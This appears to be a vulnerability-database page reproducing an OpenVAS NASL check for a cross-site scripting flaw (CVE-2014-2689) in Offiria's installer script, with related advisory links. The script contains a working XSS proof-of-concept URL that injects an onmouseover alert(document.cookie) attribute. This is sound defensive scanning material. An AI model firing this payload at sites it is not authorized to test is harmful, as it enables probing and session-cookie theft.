Offiria Cross-Site Scripting Vulnerability
🗓️ 27 May 2015 00:00:00Reported by Copyright (C) 2015 Greenbone AGType
openvas🔗 plugins.openvas.org👁 20 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Offiria 2.1.0 Cross Site Scripting Vulnerability | 8 May 201400:00 | – | zdt | |
| CVE-2014-2689 | 8 May 201414:00 | – | cve | |
| CVE-2014-2689 | 8 May 201414:00 | – | cvelist | |
| EUVD-2014-2717 | 7 Oct 202500:30 | – | euvd | |
| Cross-Site Scripting (XSS) in Offiria | 2 Apr 201400:00 | – | htbridge | |
| CVE-2014-2689 | 8 May 201414:29 | – | nvd | |
| Offiria 2.1.0 Cross Site Scripting | 7 May 201400:00 | – | packetstorm | |
| Cross site scripting | 8 May 201414:29 | – | prion | |
| Cross-Site Scripting (XSS) in Offiria | 10 May 201400:00 | – | securityvulns | |
| [oss-security] CVE Request ---- SOAPpy 0.12.5 Multiple Vulnerabilities | 10 May 201400:00 | – | securityvulns |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/archive/1/532048 |
| zerodaylab | www.zerodaylab.com/vulnerabilities/CVE-2014/CVE-2014-2689.html |
| htbridge | www.htbridge.com/advisory/HTB23210 |
| offiria | www.offiria.com/ |
# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:slashes&dots:offria";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.805191");
script_version("2023-07-25T05:05:58+0000");
script_cve_id("CVE-2014-2689");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
script_tag(name:"creation_date", value:"2015-05-27 16:23:32 +0530 (Wed, 27 May 2015)");
script_tag(name:"qod_type", value:"remote_analysis");
script_name("Offiria Cross-Site Scripting Vulnerability");
script_tag(name:"summary", value:"Offiria is prone to a cross-site scripting (XSS) vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
check whether it is able to read cookie or not.");
script_tag(name:"insight", value:"Flaw is due to insufficient sanitization
of user-supplied data in URI after '/installer/index.php' script is not
removed from the system by default.");
script_tag(name:"impact", value:"Successful exploitation will allow remote
attackers to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship between
their browser and the server.");
script_tag(name:"affected", value:"Offiria version 2.1.1 and probably prior.");
script_tag(name:"solution", value:"As a workaround remove the vulnerable
script or restrict access to it via .htaccess file or WAF.");
script_tag(name:"solution_type", value:"Workaround");
script_xref(name:"URL", value:"https://www.htbridge.com/advisory/HTB23210");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/532048");
script_xref(name:"URL", value:"http://www.zerodaylab.com/vulnerabilities/CVE-2014/CVE-2014-2689.html");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2015 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_offiria_remote_detect.nasl");
script_mandatory_keys("offiria/installed");
script_require_ports("Services/www", 80);
script_xref(name:"URL", value:"https://offiria.com");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!http_port = get_app_port(cpe:CPE)){
exit(0);
}
if(!appDir = get_app_location(cpe:CPE, port:http_port)){
exit(0);
}
url = appDir + '/installer/index.php/"onmouseover="alert(document.cookie) ;"=">';
if(http_vuln_check(port:http_port, url:url, check_header:TRUE,
pattern:"alert\(document.cookie\)", extra_check:">Offiria Installation<"))
{
report = http_report_vuln_url( port:http_port, url:url );
security_message(port:http_port, data:report);
exit(0);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jul 2023 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24.3
EPSS0.01193